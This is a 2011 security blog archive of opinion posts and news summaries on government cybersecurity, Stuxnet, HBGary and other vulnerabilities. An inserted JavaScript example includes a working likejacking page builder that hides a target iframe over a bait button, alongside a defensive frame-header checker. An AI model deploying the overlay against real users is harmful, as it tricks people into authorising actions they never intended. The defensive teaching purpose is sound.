« Archives in February, 2011

How Hackers Could Exploit Federal Government Shutdown

I know I got beat up for this last time but yet another pundit attempts to make news out of something he has no knowledge of. Neal Ungerleider wrote an article titled “How Hackers Could Exploit Federal Government Shutdown” for Fast Company. Mr. Ungerleider writes:

The possible government shutdown scheduled for March 4, 2011 could trigger a cyberwar emergency. If non-essential government employees end up being furloughed in early March, the federal government’s computer systems will be run by a shortlist of critical-need employees.

The problem with this statement is that the majority of the government’s infrastructure is managed and maintained by contractors.

While government agencies are indeed scrambling to put together lists of emergency security employees to fight potential hacker attacks from China and elsewhere, there’s one problem. The federal government works at the speed of bureaucracy.

Ok, you got that one right. The government does work at the speed of bureaucracy, and that’s why we are in this situation. However, the security employees are not all federal employees, and not all of the network infrastructure is managed and maintained by the federal government. Thankfully, the majority of the critical infrastructure, including the networks that the federal government uses, is run by contractor employees who will not be affected by a government shutdown. The men and women who already do this day in and day out will still be there fulfilling their roles.

With only five working days remaining before the potential shutdown, there is a strong likelihood of a lapse in the federal government’s network security infrastructure.

Not likely. The only lapse will be in the effectiveness of the people we have elected to do what we entrusted them to do, and that’s to run the government.

Read more…

A Chat With The Cybersecurity Czar

“Howard Schmidt talks global cooperation in cyberattack prevention, and how the feds should share threat intelligence with private industry”

Are you kidding me? The federal government has a hard time sharing threat intelligence among its own agencies. So, how is it going to filter that down to private industry with anything actionable? The federal government continues to be a paper trail of bureaucracy that does anything but promote an effective cyber security program. The most important thing to do is meet the Office of Management and Budget (OMB) mandates (why they are directing cyber security through worthless mandates, I don’t know) and respond with your mandatory FISMA paperwork.

The Czar goes on to say:

When asked how these events have shaped or changed the mission of his office, Schmidt reiterated that his office is in charge of coordinating the government’s cybersecurity efforts. “We are a convening body, a coordinating body,” he said. The White House office basically provides the mechanism for cyberincident response, he noted.

I beg to differ. The cyber security efforts have been coordinated and carried out by the boots on the ground. It’s the men and women with a true desire for cyber security who are leading the charge in the trenches and dealing with the compliance and paperwork that does nothing for security. I can honestly say that I have never had the White House staff working endless hours by my side during a major incident. Providing the mechanism for cyber incident response means quitting the bickering over the budget and providing the funds and resources to properly implement a cyber security program.

I’ll wait to see what kind of comments I get, but if Mr. Schmidt wants to attract and retain Information Security talent then he needs to put his money where his mouth is. Most people I know in the field aren’t worried about becoming the next undersecretary for cyber security. They want to be productive and proactive in their efforts to secure the Nation’s networks, federal and private, and rest assured that the government is providing the resources to do so.

Let’s quit talking and start doing.

Read more…

Facebook users subjected to more clickjacking

Facebook users have been subjected to another round of clickjacking attacks that force them to authorize actions they had no intention of approving.

The latest episode in this continuing saga, according to Sophos researchers, is a set of campaigns aimed at Italian-speaking users of the social network. The come-ons promise shocking videos about such things as the real ingredients of Coca Cola. Instead, victims are tricked into registering their approval of the videos through Facebook’s “Like” button, which sits invisibly under the spot they actually click.

Read more…
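The overlay trick behind these campaigns, together with the check a site owner can run to see whether its own pages are frameable, as an added example that is not from the Sophos write-up or this post. The URLs and the function names `buildLikejackingPage` and `framingAllowed` are placeholders chosen for the example. One caveat a practitioner should keep in mind: a Like button is built to be embedded on third-party pages, so Facebook cannot put `X-Frame-Options: DENY` or `frame-ancestors 'none'` on it; those headers protect state-changing actions on your own pages, which is where the check below is useful.

```javascript
// Added example, not code from the Sophos report or the original post.
// The URLs below are placeholders chosen for the example.

// --- attacker side: the likejacking overlay -------------------------------
// The bait button is what the victim believes they are clicking. The iframe
// that really carries the target's button (a "Like" button in the Facebook
// campaigns) is stacked over it with opacity 0 and a higher z-index, so the
// click is delivered to the framed document, inside the victim's own session.
function buildLikejackingPage(targetUrl, baitText) {
  return [
    '<!doctype html><html><body>',
    '<button id="bait" style="position:absolute;top:100px;left:100px;' +
      `width:120px;height:30px">${baitText}</button>`,
    `<iframe src="${targetUrl}" style="position:absolute;top:100px;left:100px;` +
      'width:120px;height:30px;opacity:0;z-index:10;border:0"></iframe>',
    '</body></html>',
  ].join('\n');
}

// --- defender side: can this response be framed from frameOrigin? ---------
// Follows browser precedence: a Content-Security-Policy frame-ancestors
// directive, when present, wins over X-Frame-Options; with neither header the
// page can be framed from anywhere. Origins are compared as exact strings;
// host patterns and wildcards inside frame-ancestors are not implemented here.
function framingAllowed(headers, pageOrigin, frameOrigin) {
  const header = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? null : String(headers[key]);
  };
  const page = pageOrigin.toLowerCase();
  const framer = frameOrigin.toLowerCase();

  const csp = header('content-security-policy');
  if (csp !== null) {
    const directive = csp
      .split(';')
      .map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive !== undefined) {
      const sources = directive
        .split(/\s+/)
        .slice(1)
        .map((s) => s.replace(/^'|'$/g, '').toLowerCase());
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      if (sources.includes('self') && framer === page) return true;
      return sources.includes(framer);
    }
  }

  const xfo = header('x-frame-options');
  if (xfo !== null) {
    switch (xfo.trim().toUpperCase()) {
      case 'DENY':
        return false;
      case 'SAMEORIGIN':
        return framer === page;
      default:
        // Unrecognized values (including the obsolete ALLOW-FROM) are ignored
        // by current browsers, so the page is effectively unprotected.
        return true;
    }
  }
  return true;
}

// Stand-alone demo: no framing headers is the vulnerable case, a
// frame-ancestors 'none' policy is the hardened one.
console.log({
  vulnerable: framingAllowed({}, 'https://site.example', 'https://evil.example'),
  hardened: framingAllowed(
    { 'Content-Security-Policy': "frame-ancestors 'none'" },
    'https://site.example', 'https://evil.example'),
});
console.log(buildLikejackingPage('https://example.com/like-button', 'Play video'));
```

Run it under Node; the first line printed is `{ vulnerable: true, hardened: false }`, followed by the attacker page markup. The check is deliberately strict in the attacker's favour: any header value a browser would ignore counts as "frameable", which is what you want from a scanner.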

Anonymous Hackers Release Stuxnet Worm Online…so what?

Fox News has released an article by Jeremy A. Kaplan titled “Anonymous Hackers Release Stuxnet Worm Online.” A friend of mine pointed me to the article and at first it seemed real interesting when Kaplan mentioned “a decrypted version of the same cyberworm that crippled Iran’s nuclear power program.”

I was actually excited when my friend said he was downloading a copy. However, what is really being offered up is a version of Stuxnet partially decompiled with Hex-Rays. This isn’t all that glamorous. Who that does any type of malware research doesn’t already have a copy of this?

The most troubling issue I have with the Fox News article is:

“And the security experts FoxNews.com spoke with said the leaked code was serious cause for concern.”

Who are the experts? It’s no more serious than it was months ago. Stuxnet code has been out there for some time. My version, just like the newly acquired code by Anonymous, has been partially decompiled with Hex-Rays too. I don’t want to discredit Dave Aitel, CEO of Immunity Inc., as a highly respected security expert though.

“The stuxnet binary is widely available,” Aitel told FoxNews.com. “The people who would use the binary would know how to find it.”

As well as knowing how to decompile it. Thanks for keeping the media straight, Dave.

Anonymous speaks: the inside story of the HBGary hack

A really good article has been posted on Ars Technica about the HBGary hack.

Read more…

Java 6 Update 24 Plugs 21 Security Holes

A new version of Java fixes at least 21 security flaws in the widely-distributed software bundle. Updates are available for Windows, Linux and Solaris users.

Read the advisory

Windows 0-day SMB mrxsmb.dll vulnerability

A new vulnerability has been discovered in the SMB component of Windows. The attack involves sending malformed Browser Election requests, leading to a heap overflow within the mrxsmb.dll driver. The vulnerability is known to cause a DoS and is reported to allow full control of vulnerable machines. Proof-of-concept code for the DoS has been released.

Read the advisory

Hacked and Now Vandalized, HBGary Pulls out of RSA

The California security company that is at the center of a controversy over a plan to discredit WikiLeaks and its supporters abruptly pulled itself out of the RSA security conference in San Francisco this week, citing security concerns.

The company’s subsidiary, HBGary Federal, also cancelled a talk it had planned to give on the Internet activist group, Anonymous. It was news of this talk that riled Anonymous and precipitated the controversy last week.

Read more…

Seven Types of Hackers

Roger Grimes has published an article titled “Your guide to the seven types of malicious hackers.” The article explains the importance of knowing the difference between a spammer, a corporate spy, and a cyber warrior so that you can better defend your systems.

He goes on to list the following seven types:

  • Cyber criminals
  • Spammers and adware spreaders
  • Advanced persistent threat (APT) agents
  • Corporate spies
  • Hacktivists
  • Cyber warriors
  • Rogue hackers

Read more…

Linux vulnerable to Windows-style autorun exploits

Jon Larimer, of IBM’s X-Force security division, has demonstrated how it might be possible to perform autorun-style attacks against weakly secured Linux PCs. Larimer developed a demo showing how it might be possible to insert a USB stick with modified code into an Ubuntu PC, dismiss the screensaver without entering a password, and display the user’s desktop.

Read more…